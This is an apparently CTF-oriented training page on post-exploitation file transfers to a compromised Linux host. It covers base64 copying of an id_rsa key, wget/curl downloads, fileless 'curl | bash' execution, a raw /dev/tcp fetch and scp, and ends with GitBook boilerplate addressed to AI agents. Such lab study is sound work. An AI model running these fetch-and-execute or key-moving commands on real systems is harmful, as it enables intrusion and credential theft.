> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/post-exploitation/file-transfers/linux-file-transfer-download.md).

# Linux File Transfer Download

Linux hosts usually give you one of these download paths.

In practice, `curl`, then `wget`, then Python is a common order to try.

{% hint style="info" %}
**Attacker** means your box, Pwnbox, or redirector.

**Compromised host** means the Linux machine you already accessed.
{% endhint %}

### Download methods

#### 1. Base64 encode and decode

Use this when no direct network transfer works.

Run the first two commands on the **attacker**.

Run the last two commands on the **compromised host**.

```bash
# Check hash first
md5sum id_rsa

# Encode on source machine
cat id_rsa | base64 -w 0; echo

# Decode on target machine
echo -n '<base64string>' | base64 -d > id_rsa

# Verify hash matches
md5sum id_rsa
```

`-n` in `echo` means do not add a newline.

That keeps the Base64 string clean for decoding.

#### 2. `wget` and `curl`

Use this when outbound HTTP or HTTPS works.

**Compromised host — run one of these commands**

```bash
# wget — capital -O for output filename
wget https://<url>/file.sh -O /tmp/file.sh

# curl — lowercase -o for output filename
curl -o /tmp/file.sh https://<url>/file.sh
```

> Only difference worth remembering: `wget` uses `-O`. `curl` uses `-o`.

#### 3. Fileless downloads

Use this when you want to execute content without saving it first.

**Compromised host — run one of these commands**

```bash
# curl — pipe directly into bash
curl https://<url>/script.sh | bash

# wget — pipe into python3
wget -qO- https://<url>/script.py | python3
```

`-qO-` in `wget` means quiet mode and print to stdout.

Then the output pipes straight into the interpreter.

#### 4. Bash `/dev/tcp`

Use this when `wget`, `curl`, and Python are all missing.

**Attacker — start a web server in the folder containing your file**

```bash
python3 -m http.server 80
```

**Compromised host — fetch the file over raw TCP**

```bash
# Step 1 — open TCP connection to web server, assign to file descriptor 3
exec 3<>/dev/tcp/10.10.10.32/80

# Step 2 — send HTTP GET request through that connection
echo -e "GET /file.sh HTTP/1.1\n\n" >&3

# Step 3 — read and print the response
cat <&3
```

Think of file descriptor `3` as a pipe to the remote server.

You write the HTTP request into it, then read the response back out.

#### 5. SCP

SCP uses SSH on port `22`.

It is encrypted and usually cleaner than HTTP when SSH is available.

**Attacker — start SSH on the host serving the file**

```bash
# Start SSH server on Pwnbox first
sudo systemctl enable ssh
sudo systemctl start ssh
```

**Compromised host — pull the file over SSH**

```bash
# Download FROM remote TO local (run on target)
scp user@192.168.49.128:/root/file.txt .

# The dot at the end means "current directory"
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/post-exploitation/file-transfers/linux-file-transfer-download.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
